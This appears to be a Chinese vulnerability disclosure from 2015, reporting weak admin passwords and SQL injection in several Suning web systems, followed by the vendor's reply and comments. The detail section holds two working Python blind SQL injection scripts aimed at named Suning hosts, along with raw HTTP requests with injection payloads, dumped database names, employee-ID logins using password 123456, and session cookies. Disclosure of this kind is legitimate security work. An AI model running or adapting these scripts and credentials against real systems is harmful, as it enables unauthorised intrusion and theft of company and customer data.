漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:苏宁多个系统存在大量弱口令&SQL注入
提交时间:2015-11-27 14:01
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:后台弱口令
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
简要描述: 苏宁多个系统存在大量弱口令&SQL注入
详细说明: 管理补充:该案例中涉及到的注入点历史均有提交和涉及,打包处理 1.http://online.suning.com/console/Service/Console/Index 04040301 123456 11051136 11031760 11078031 11078357 11078571 11051922 11075479 11076380 11077169 11077668 11078031 11078350 11078357 11078358 11078571 10080082 10080355
只尝试了几个。 注入:
#encoding=utf-8 import httplib import time import string import sys import random import urllib headers = {'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest', 'Proxy-Connection':'keep-alive', 'Referer': 'http://online.suning.com/console/Service/supplieradmin/customerIndex', 'Cookie': 'JSESSIONID=4CEBAE01446F679F9024276C9F7F00B6', 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'} payloads = list(string.ascii_uppercase) #payloads = list('T') print 'start to retrive Oracle user:' user = '' for i in range(1,7): for payload in payloads: conn = httplib.HTTPConnection('online.suning.com', timeout=60) params = { 'filterParams': "user_name like '%1%' and ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s" % (i, ord(payload)), 'page': '1', 'rows': '20', 'sort': 'companyName', 'order': 'asc', 'customerId':'', } #print urllib.urlencode(params) conn.request(method='POST', url='/console/Service/supplieradmin/pageCustomer', body = urllib.urlencode(params), headers = headers) resp = conn.getresponse() html_doc = resp.read().decode('utf-8') conn.close() #print html_doc print '.', if html_doc.find(u'userName') > 0: # True user += payload print '\n[in progress]', user break print '\nOracle user is', user
漏洞证明: 2.http://58.240.86.236 访问不了。 http://58.240.86.236/download/ 找到一个ios地址 可惜我的设备没越狱,安装不了。
没办法,扫下目录先。
居然...可以访问...
可以8位工号继续爆破。 注入:http://weibo.cnsuning.com/ajax.php?mod=member&code=sel&type=top&province=1&hid_city=
#encoding=utf-8 import httplib import time import string import sys import random import urllib headers = {'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36', 'Cookie':' _wbma=weibo.cnsuning.com%7C14353112666246444095519302%7C1435311266624%7C1435736372201%7C1435736405085%7C81%7C3; _wbmc=weibo.cnsuning.com; _wbmb=14357360303501756793251744%7C%7C%7C22;jishigou_YnQbd2_auth=b894Q1QF2ymXvAaat%2BBJ0dwP0InpJNhi3zGtCB30mGyR2Q4BH7uk%2Bf%2F%2FQKxTY%2Bysci6B4luF2L1gMgNn6on8SHIcKw; jishigou_YnQbd2_login_credits=1435736257; jishigou_YnQbd2_sid=DPZcJd', 'X-Forwarded-For':'192.168.121.194'} payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' print 'start to retrive Current database name :' user = '' for i in range(1,6): for payload in payloads: conn = httplib.HTTPConnection('weibo.cnsuning.com', timeout=120) conn.request(method='GET', url='/ajax.php?mod=member&code=sel&type=top&province=1/**/and/**/ascii(substr(database(),%s,1))=%s' % (i,ord(payload)), headers=headers) resp = conn.getresponse() html_doc = resp.read() conn.close() #print html_doc print '.', if html_doc.find('value=41') > 0: # True #print bb user += payload print '\n[in progress]', user break print '\nCurrent Database name is', user
3.http://fota.suning.com/ http://bug2go.suning.com/ POST / HTTP/1.1 Host: 218.2.113.254 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://218.2.113.254/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 51 formhash=73350ae2&login=1&username=123&password=123
available databases [3]: [*] bug2go [*] information_schema [*] test
GET /workOrder/workOrderContent.htm?noCache=1448209074131&active=&keyword=1'&pageNumber=1 HTTP/1.1 Host: sws.suning.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://sws.suning.com/console.html Cookie: _device_session_id=p_035d5322-bebf-43df-a4b0-32eb3078fd91; _customId=s5aac5bb0281; Hm_lvt_bc611aeb03796ac6788544b9a75ff641=1448208897; Hm_lpvt_bc611aeb03796ac6788544b9a75ff641=1448208933; _snma=1%7C144820889823549650%7C1448208898235%7C1448208923889%7C1448208932488%7C3%7C1; _snmc=1; _snsr=direct%7Cdirect%7C%7C%7C; _snmb=144820889825797119%7C1448208932498%7C1448208932492%7C3; _snmp=144820893248587390; __wmv=1448208899.1; __wms=1448210699; authId=siE8C38068EFF3ED6F11FFBE119685A4B8; custno=6132453427; idsLoginUserIdLastTime=653143550%40qq.com; logonStatus=2; nick=65***0%40qq.com; nick2=65***0%40qq.com; ZONE_ID=z-nj1; JSESSIONID=uVnq8S5rDC8J8lkjl4Ec1nBC.master:server-one Connection: keep-alive
{"message":"PreparedStatementCallback; bad SQL grammar [SELECT COUNT(*) count FROM T_WORK_ORDER A, SPCU.T_USER_INFO B WHERE A.STATUS = 1 AND A.USER_ID = B.ID AND A.USER_ID = ? AND (A.UUID like '%1'%' OR A.TITLE like '%1'%') ]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR A.TITLE like '%1'%')' at line 1","result":"false"}
修复方案: 漏洞回应 厂商回应: 危害等级:中
漏洞Rank:10
确认时间:2015-11-27 14:16
厂商回复: 问题1的系统属于即将废弃的,问题3已经从其他平台知晓。问题2正在确认。
最新状态: 暂无
漏洞评价:
评价
2015-11-28 22:10 |
黑色键盘丶 ( 实习白帽子 | Rank:68 漏洞数:44 | 我喜欢你关你什么事?有本事你也喜欢我试试...)
2015-11-28 22:25 |
_Thorns ( 普通白帽子 | Rank:1612 漏洞数:241 | WooYun is the Bigest gay place :))
2015-11-28 22:40 |
黑色键盘丶 ( 实习白帽子 | Rank:68 漏洞数:44 | 我喜欢你关你什么事?有本事你也喜欢我试试...)
2015-11-28 22:40 |
黑色键盘丶 ( 实习白帽子 | Rank:68 漏洞数:44 | 我喜欢你关你什么事?有本事你也喜欢我试试...)
2015-11-28 22:44 |
_Thorns ( 普通白帽子 | Rank:1612 漏洞数:241 | WooYun is the Bigest gay place :))